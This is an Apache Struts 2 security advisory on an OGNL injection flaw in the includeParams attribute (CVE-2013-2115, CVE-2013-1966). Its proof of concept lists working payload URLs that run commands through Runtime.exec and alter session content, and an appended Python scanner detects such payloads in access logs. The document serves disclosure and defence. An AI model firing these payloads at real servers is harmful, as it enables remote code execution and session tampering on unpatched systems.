Excerpt

A vulnerability introduced by forcing parameter inclusion in the URL and Anchor tags allows remote command execution, session access and manipulation, and XSS attacks.


Who should read this

All Struts 2 developers and users

Impact of vulnerability

Remote command execution, remote server context manipulation, injection of malicious client side code

Maximum security rating

Highly Critical

Recommendation

Developers should immediately upgrade to Struts 2.3.14.2

Affected Software

Struts 2.0.0 - Struts 2.3.14.1

Reporter

Eric Kobrin and Douglas Rodrigues (Akamai), Coverity Security Research Laboratory, NSFOCUS Security Team

CVE Identifier

CVE-2013-2115, CVE-2013-1966

Problem

Both the s:url and s:a tag provide an includeParams attribute.

...

The issue was originally addressed by Struts 2.3.14.1 and Security Announcement S2-013. However, the solution introduced with 2.3.14.1 did not address all possible attack vectors, such that every version of Struts 2 before 2.3.14.2 is still vulnerable to such attacks.

Proof of concept

  1. Open HelloWorld.jsp present in the Struts Blank App and add the following attribute to one of the url/a tags:

     includeParams="all"

     so that the line looks something like this:

     <s:url id="url" action="HelloWorld" includeParams="all">


  2. Run the struts2-blank app.
  3. Open the following URL, which results in the calc application opening on Windows (try ....exec('open%20.')} to open a Finder window on Mac OS):

     http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}


  4. Open the following URL to modify session content:

     http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]='true'}


  5. Open the following URL to print out the session content and, in combination with the previous example, introduce arbitrary code into the resulting HTML output:

     http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]}
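As an added, defender-side example (not part of this bulletin or of the Struts project), the following Python scanner flags access-log requests whose query string carries an OGNL expression of the shape shown in the proof of concept, percent-decoding repeatedly so that double-encoded probes are not missed. The log lines, regexes and severity labels are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample (not from the bulletin): line 2 is the step-4 session probe percent-encoded, line 3 the step-5 expression double-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [28/May/2013:10:00:01 +0000] "GET /struts2-blank/example/HelloWorld.action?name=bob HTTP/1.1" 200 512
10.0.0.9 - - [28/May/2013:10:00:02 +0000] "GET /struts2-blank/example/HelloWorld.action?aaa=1$%7B%23session%5B%22hacked%22%5D%3D'true'%7D HTTP/1.1" 200 640
10.0.0.9 - - [28/May/2013:10:00:03 +0000] "GET /struts2-blank/example/HelloWorld.action?aaa=1%2524%257B%2523session%255B%2522hacked%2522%255D%257D HTTP/1.1" 200 640
"""

# Combined-format access-log request line: client, timestamp, method, target, status.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
OGNL_OPENER = re.compile(r"[$%]\{")  # ${...} or %{...} expression delimiters
OGNL_TOKENS = re.compile(r"#_memberAccess|allowStaticMethodAccess|#session\b|@[\w.]+@", re.I)  # context/static-access tokens

def fully_decode(text, max_rounds=3):
    """Percent-decode until the string stops changing (bounded) so double-encoded payloads normalise."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify_target(target):
    """Return (severity, decoded_query): 'none' (no opener), 'suspicious' (opener only)
    or 'high' (opener plus an OGNL context/static-access token)."""
    query = target.split("?", 1)[1] if "?" in target else ""
    decoded = fully_decode(query)
    if not OGNL_OPENER.search(decoded):
        return "none", decoded
    if OGNL_TOKENS.search(decoded):
        return "high", decoded
    return "suspicious", decoded

def scan_log(text):
    """Parse each log line and report requests whose query string looks like an OGNL expression."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        severity, decoded = classify_target(m["target"])
        if severity != "none":
            findings.append({"ip": m["ip"], "ts": m["ts"], "severity": severity, "query": decoded})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:<10} {f['ip']}  {f['query']}")
```

Feed real log text to scan_log and tune OGNL_TOKENS to your own alerting threshold; an opener alone is worth reviewing, a context token is worth paging on.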


...